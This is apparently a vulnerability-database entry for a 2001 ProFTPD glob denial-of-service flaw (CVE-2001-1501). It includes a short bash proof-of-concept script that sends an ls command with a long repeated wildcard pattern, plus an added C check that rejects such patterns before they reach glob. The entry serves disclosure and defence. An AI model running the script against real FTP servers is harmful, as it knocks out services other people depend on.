ProFTPD glob Function Denial of Service Vulnerability

Vulnerability ID 1106254 Vulnerability type Unknown
Published 2001-03-15 Updated 2001-12-31
CVE ID CVE-2001-1501
CNNVD-ID CNNVD-200112-252
Platform Linux CVSS score 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/20690
https://www.securityfocus.com/bid/89750
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-252
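|Vulnerability details
The glob function in ProFTPD 1.2.1, and possibly other versions, is vulnerable. An attacker can cause a denial of service (CPU and memory consumption) with commands that contain very long wildcards and other special characters, as demonstrated by an ls command whose argument contains multiple (1) "*/..", (2) "*/.*", or (3) ".*./*?/" sequences.
|Exploit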
source: http://www.securityfocus.com/bid/2496/info

Many FTP servers are vulnerable to a denial of service condition resulting from poor globbing algorithms and user resource usage limits.

Globbing generates pathnames from file name patterns used by the shell, eg. wildcards denoted by * and ?, multiple choices denoted by {}, etc.

The vulnerable FTP servers can be exploited to exhaust system resources if per-user resource usage controls have not been implemented. 

#!/bin/bash
ftp -n FTP-SERVER<<end
quot user anonymous
bin
quot pass [email protected]
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye
end
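
A pre-check a server could apply to an ls argument before it reaches glob(3), written as an added example and not taken from ProFTPD or the original advisory. It bounds the three things the description above names: pattern length, path components that contain wildcards, and ".." components that follow a wildcard; the limits and function names are assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Illustrative limits (assumptions, not ProFTPD settings); tune per site. */
#define MAX_PATTERN_LEN   256
#define MAX_WILD_SEGMENTS 3  /* components containing * ? [ or { */
#define MAX_BACKTRACKS    1  /* ".." components that follow a wildcard */

struct glob_cost {
    size_t length;      /* bytes in the whole argument */
    int wild_segments;  /* each one multiplies the candidate set */
    int backtracks;     /* ".." after a wildcard re-expands the parent */
};

/* True if the component s[0..len) contains a glob metacharacter. */
static bool has_glob_meta(const char *s, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (strchr("*?[{", s[i]) != NULL)
            return true;
    return false;
}

/* Measure the argument one '/'-separated component at a time. */
struct glob_cost glob_cost_measure(const char *pattern)
{
    struct glob_cost cost = { strlen(pattern), 0, 0 };
    for (const char *p = pattern; *p != '\0'; ) {
        size_t len = strcspn(p, "/");
        if (has_glob_meta(p, len))
            cost.wild_segments++;
        else if (len == 2 && p[0] == '.' && p[1] == '.' && cost.wild_segments > 0)
            cost.backtracks++;
        p += len;
        if (*p == '/')
            p++;  /* skip the separator; empty components are ignored */
    }
    return cost;
}

/* True when the argument should be refused before it reaches glob(3). */
bool glob_pattern_rejected(const char *pattern)
{
    struct glob_cost c = glob_cost_measure(pattern);
    return c.length > MAX_PATTERN_LEN
        || c.wild_segments > MAX_WILD_SEGMENTS
        || c.backtracks > MAX_BACKTRACKS;
}
```

A check like this complements, and does not replace, the per-user resource limits the advisory says were missing.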
|Affected products
ProFTPD Project ProFTPD 1.2.1
|References

Source: CONECTIVA
Name: CLA-2002:450
Link: http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000450
Source: MANDRAKE
Name: MDKSA-2002:005
Link: http://www.mandriva.com/security/advisories?name=MDKSA-2002:005
